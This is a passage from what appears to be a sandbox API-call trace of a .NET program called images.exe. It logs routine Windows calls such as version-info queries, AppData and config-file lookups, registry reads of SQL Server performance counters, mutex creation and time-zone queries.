puLen=0x33ea64 | out: lplpBuffer=0x33ea68*=0x28895c4, puLen=0x33ea64) returned 1 [0155.515] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x33ea68, puLen=0x33ea64 | out: lplpBuffer=0x33ea68*=0x28895f8, puLen=0x33ea64) returned 1 [0155.515] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x33ea68, puLen=0x33ea64 | out: lplpBuffer=0x33ea68*=0x288962c, puLen=0x33ea64) returned 1 [0155.515] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x33ea68, puLen=0x33ea64 | out: lplpBuffer=0x33ea68*=0x2889660, puLen=0x33ea64) returned 1 [0155.515] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x33ea68, puLen=0x33ea64 | out: lplpBuffer=0x33ea68*=0x28896f4, puLen=0x33ea64) returned 1 [0155.515] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x33ea68, puLen=0x33ea64 | out: lplpBuffer=0x33ea68*=0x2889724, puLen=0x33ea64) returned 1 [0155.515] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x33ea68, puLen=0x33ea64 | out: lplpBuffer=0x33ea68*=0x288975c, puLen=0x33ea64) returned 1 [0155.516] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x33ea68, puLen=0x33ea64 | out: lplpBuffer=0x33ea68*=0x288954c, puLen=0x33ea64) returned 1 [0155.516] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x33ea68, puLen=0x33ea64 | out: lplpBuffer=0x33ea68*=0x28896bc, puLen=0x33ea64) returned 1 [0155.516] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x33ea68, puLen=0x33ea64 | out: lplpBuffer=0x33ea68*=0x0, puLen=0x33ea64) returned 0 [0155.516] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x33ea68, puLen=0x33ea64 | out: lplpBuffer=0x33ea68*=0x0, puLen=0x33ea64) returned 0 [0155.516] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x33ea5c, puLen=0x33ea58 | out: lplpBuffer=0x33ea5c*=0x28894f4, puLen=0x33ea58) returned 1 [0155.516] VerLanguageNameW (in: wLang=0x0, szLang=0x33e7ec, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0155.516] VerQueryValueW (in: pBlock=0x2889458, lpSubBlock="\\", lplpBuffer=0x33ea6c, puLen=0x33ea68 | out: lplpBuffer=0x33ea6c*=0x2889480, puLen=0x33ea68) returned 1 [0155.518] CoTaskMemAlloc (cb=0x20c) returned 0x7afda8 [0155.518] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7afda8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0155.518] CoTaskMemFree (pv=0x7afda8) [0155.518] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x33e58c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0155.518] CoTaskMemAlloc (cb=0x20c) returned 0x7afda8 [0155.518] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x7afda8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0155.518] CoTaskMemFree (pv=0x7afda8) [0155.518] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x33e58c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0155.519] GetCurrentProcess () returned 0xffffffff [0155.519] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33ea24 | out: TokenHandle=0x33ea24*=0x294) returned 1 [0155.519] GetCurrentProcess () returned 0xffffffff [0155.519] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33ea24 | out: TokenHandle=0x33ea24*=0x298) returned 1 [0155.519] GetCurrentProcess () returned 0xffffffff [0155.519] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33e8f0 | out: TokenHandle=0x33e8f0*=0x29c) returned 1 [0155.520] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\images.exe_url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x33e8f0 | out: lpFileInformation=0x33e8f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.520] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x33e39c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x7e [0155.520] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\images.exe_url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x33e8f0 | out: lpFileInformation=0x33e8f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.520] GetCurrentProcess () returned 0xffffffff [0155.521] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33ea24 | out: TokenHandle=0x33ea24*=0x2a0) returned 1 [0155.521] GetCurrentProcess () returned 0xffffffff [0155.521] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33e8f0 | out: TokenHandle=0x33e8f0*=0x2a4) returned 1 [0155.521] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\images.exe_url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x33e8f0 | out: lpFileInformation=0x33e8f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.521] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x33e39c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x7c [0155.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\images.exe_url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x33e8f0 | out: lpFileInformation=0x33e8f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.524] GetCurrentProcess () returned 0xffffffff [0155.524] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33eb04 | out: TokenHandle=0x33eb04*=0x2a8) returned 1 [0155.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x33e5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0155.524] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x33eb04 | out: lpFileInformation=0x33eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0155.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x33e53c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0155.524] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x33ea30) returned 1 [0155.524] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2ac [0155.524] GetFileType (hFile=0x2ac) returned 0x1 [0155.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x33ea2c) returned 1 [0155.525] GetFileType (hFile=0x2ac) returned 0x1 [0155.525] GetFileSize (in: hFile=0x2ac, lpFileSizeHigh=0x33eaf8 | out: lpFileSizeHigh=0x33eaf8*=0x0) returned 0x8c8f [0155.525] ReadFile (in: hFile=0x2ac, lpBuffer=0x288ffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33eab4, lpOverlapped=0x0 | out: lpBuffer=0x288ffa0*, lpNumberOfBytesRead=0x33eab4*=0x1000, lpOverlapped=0x0) returned 1 [0155.525] ReadFile (in: hFile=0x2ac, lpBuffer=0x288ffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e950, lpOverlapped=0x0 | out: lpBuffer=0x288ffa0*, lpNumberOfBytesRead=0x33e950*=0x1000, lpOverlapped=0x0) returned 1 [0155.526] ReadFile (in: hFile=0x2ac, lpBuffer=0x288ffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e804, lpOverlapped=0x0 | out: lpBuffer=0x288ffa0*, lpNumberOfBytesRead=0x33e804*=0x1000, lpOverlapped=0x0) returned 1 [0155.526] ReadFile (in: hFile=0x2ac, lpBuffer=0x288ffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e804, lpOverlapped=0x0 | out: lpBuffer=0x288ffa0*, lpNumberOfBytesRead=0x33e804*=0x1000, lpOverlapped=0x0) returned 1 [0155.526] ReadFile (in: hFile=0x2ac, lpBuffer=0x288ffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e804, lpOverlapped=0x0 | out: lpBuffer=0x288ffa0*, lpNumberOfBytesRead=0x33e804*=0x1000, lpOverlapped=0x0) returned 1 [0155.526] ReadFile (in: hFile=0x2ac, lpBuffer=0x288ffa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x33e73c, lpOverlapped=0x0 | out: lpBuffer=0x288ffa0*, lpNumberOfBytesRead=0x33e73c*=0x1000, lpOverlapped=0x0) returned 1 [0155.527] CloseHandle (hObject=0x2ac) returned 1 [0155.527] GetCurrentProcess () returned 0xffffffff [0155.527] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33eac0 | out: TokenHandle=0x33eac0*=0x2ac) returned 1 [0155.527] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\images.exe.config", nBufferLength=0x105, lpBuffer=0x33e56c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\images.exe.config", lpFilePart=0x0) returned 0x20 [0155.527] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\images.exe.config" (normalized: "c:\\programdata\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x33eac0 | out: lpFileInformation=0x33eac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.528] GetCurrentProcess () returned 0xffffffff [0155.528] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33ea7c | out: TokenHandle=0x33ea7c*=0x2b0) returned 1 [0155.528] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x33e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x7e [0155.528] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\images.exe_url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x33ea7c | out: lpFileInformation=0x33ea7c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.528] GetCurrentProcess () returned 0xffffffff [0155.529] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33ea38 | out: TokenHandle=0x33ea38*=0x2b4) returned 1 [0155.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x33e4e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x7c [0155.529] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\images.exe_url_eqbepp4itfjuxmwxkohtvw1odsza5bdo\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x33ea38 | out: lpFileInformation=0x33ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0155.546] GetCurrentProcess () returned 0xffffffff [0155.546] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33e8e8 | out: TokenHandle=0x33e8e8*=0x2b8) returned 1 [0155.575] GetCurrentProcess () returned 0xffffffff [0155.575] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33e828 | out: TokenHandle=0x33e828*=0x2bc) returned 1 [0155.586] GetCurrentProcess () returned 0xffffffff [0155.586] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x33e870 | out: TokenHandle=0x33e870*=0x2c0) returned 1 [0156.130] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x7855b0 [0156.160] GetCurrentProcessId () returned 0x530 [0156.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x33e0a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x63 [0156.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x33e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x63 [0156.172] CoTaskMemAlloc (cb=0x32) returned 0x7a8d48 [0156.172] CoTaskMemAlloc (cb=0xc8) returned 0x7af720 [0156.173] CoTaskMemFree (pv=0x7a8d48) [0156.173] CoTaskMemFree (pv=0x7af720) [0156.424] GetComputerNameW (in: lpBuffer=0x33d46c, nSize=0x28c1310 | out: lpBuffer="XDUWTFONO", nSize=0x28c1310) returned 1 [0156.430] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET Data Provider for SqlServer\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x33d6a4 | out: phkResult=0x33d6a4*=0x2c4) returned 0x0 [0156.431] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Library", lpReserved=0x0, lpType=0x33d6b8, lpData=0x0, lpcbData=0x33d6b4*=0x0 | out: lpType=0x33d6b8*=0x1, lpData=0x0, lpcbData=0x33d6b4*=0x1c) returned 0x0 [0156.431] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Library", lpReserved=0x0, lpType=0x33d6b8, lpData=0x28c1f9c, lpcbData=0x33d6b4*=0x1c | out: lpType=0x33d6b8*=0x1, lpData="netfxperf.dll", lpcbData=0x33d6b4*=0x1c) returned 0x0 [0156.432] RegQueryValueExW (in: hKey=0x2c4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x33d6c4, lpData=0x0, lpcbData=0x33d6c0*=0x0 | out: lpType=0x33d6c4*=0x4, lpData=0x0, lpcbData=0x33d6c0*=0x4) returned 0x0 [0156.432] RegQueryValueExW (in: hKey=0x2c4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x33d6c4, lpData=0x33d6b0, lpcbData=0x33d6c0*=0x4 | out: lpType=0x33d6c4*=0x4, lpData=0x33d6b0*=0x1, lpcbData=0x33d6c0*=0x4) returned 0x0 [0156.434] RegQueryValueExW (in: hKey=0x2c4, lpValueName="First Counter", lpReserved=0x0, lpType=0x33d6c4, lpData=0x0, lpcbData=0x33d6c0*=0x0 | out: lpType=0x33d6c4*=0x4, lpData=0x0, lpcbData=0x33d6c0*=0x4) returned 0x0 [0156.434] RegQueryValueExW (in: hKey=0x2c4, lpValueName="First Counter", lpReserved=0x0, lpType=0x33d6c4, lpData=0x33d6b0, lpcbData=0x33d6c0*=0x4 | out: lpType=0x33d6c4*=0x4, lpData=0x33d6b0*=0x1386, lpcbData=0x33d6c0*=0x4) returned 0x0 [0156.434] RegCloseKey (hKey=0x2c4) returned 0x0 [0156.437] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net data provider for sqlserver\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x33d69c | out: phkResult=0x33d69c*=0x2c4) returned 0x0 [0156.438] RegQueryValueExW (in: hKey=0x2c4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x33d6bc, lpData=0x0, lpcbData=0x33d6b8*=0x0 | out: lpType=0x33d6bc*=0x4, lpData=0x0, lpcbData=0x33d6b8*=0x4) returned 0x0 [0156.438] RegQueryValueExW (in: hKey=0x2c4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x33d6bc, lpData=0x33d6a8, lpcbData=0x33d6b8*=0x4 | out: lpType=0x33d6bc*=0x4, lpData=0x33d6a8*=0x3, lpcbData=0x33d6b8*=0x4) returned 0x0 [0156.438] RegQueryValueExW (in: hKey=0x2c4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x33d6bc, lpData=0x0, lpcbData=0x33d6b8*=0x0 | out: lpType=0x33d6bc*=0x4, lpData=0x0, lpcbData=0x33d6b8*=0x4) returned 0x0 [0156.438] RegQueryValueExW (in: hKey=0x2c4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x33d6bc, lpData=0x33d6a8, lpcbData=0x33d6b8*=0x4 | out: lpType=0x33d6bc*=0x4, lpData=0x33d6a8*=0x20000, lpcbData=0x33d6b8*=0x4) returned 0x0 [0156.438] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x33d6bc, lpData=0x0, lpcbData=0x33d6b8*=0x0 | out: lpType=0x33d6bc*=0x3, lpData=0x0, lpcbData=0x33d6b8*=0x30a) returned 0x0 [0156.438] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x33d6bc, lpData=0x28c2888, lpcbData=0x33d6b8*=0x30a | out: lpType=0x33d6bc*=0x3, lpData=0x28c2888*, lpcbData=0x33d6b8*=0x30a) returned 0x0 [0156.442] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0156.445] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x33d5f8, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net data provider for sqlserver") returned 0x2c8 [0156.446] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x4b0000 [0156.446] VirtualQuery (in: lpAddress=0x4b0000, lpBuffer=0x33d69c, dwLength=0x1c | out: lpBuffer=0x33d69c*(BaseAddress=0x4b0000, AllocationBase=0x4b0000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0156.447] LocalFree (hMem=0x79d618) returned 0x0 [0156.447] RegCloseKey (hKey=0x2c4) returned 0x0 [0156.456] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x28c3da0, cbSid=0x33d678 | out: pSid=0x28c3da0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x33d678) returned 1 [0156.461] CreateMutexW (lpMutexAttributes=0x28c3eb4, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0156.462] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0156.469] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x28c40b8, cbSid=0x33d63c | out: pSid=0x28c40b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x33d63c) returned 1 [0156.470] CreateMutexW (lpMutexAttributes=0x28c4194, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x0 [0156.470] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net data provider for sqlserver") returned 0x2cc [0156.472] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x1f4) returned 0x0 [0156.472] ReleaseMutex (hMutex=0x2cc) returned 1 [0156.472] CloseHandle (hObject=0x2cc) returned 1 [0156.474] GetCurrentProcessId () returned 0x530 [0156.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x530) returned 0x2cc [0156.475] GetProcessTimes (in: hProcess=0x2cc, lpCreationTime=0x33d640, lpExitTime=0x33d638, lpKernelTime=0x33d638, lpUserTime=0x33d638 | out: lpCreationTime=0x33d640, lpExitTime=0x33d638, lpKernelTime=0x33d638, lpUserTime=0x33d638) returned 1 [0156.476] CloseHandle (hObject=0x2cc) returned 1 [0156.477] ReleaseMutex (hMutex=0x2c4) returned 1 [0156.477] CloseHandle (hObject=0x2c4) returned 1 [0156.477] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x28c4d30, cbSid=0x33d678 | out: pSid=0x28c4d30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x33d678) returned 1 [0156.477] CreateMutexW (lpMutexAttributes=0x28c4e0c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0156.478] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0156.479] GetTimeZoneInformation (in: lpTimeZoneInformation=0x33d464 | out: lpTimeZoneInformation=0x33d464) returned 0x2 [0156.484] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x33d2b8 | out: pTimeZoneInformation=0x33d2b8) returned 0x2 [0156.486] 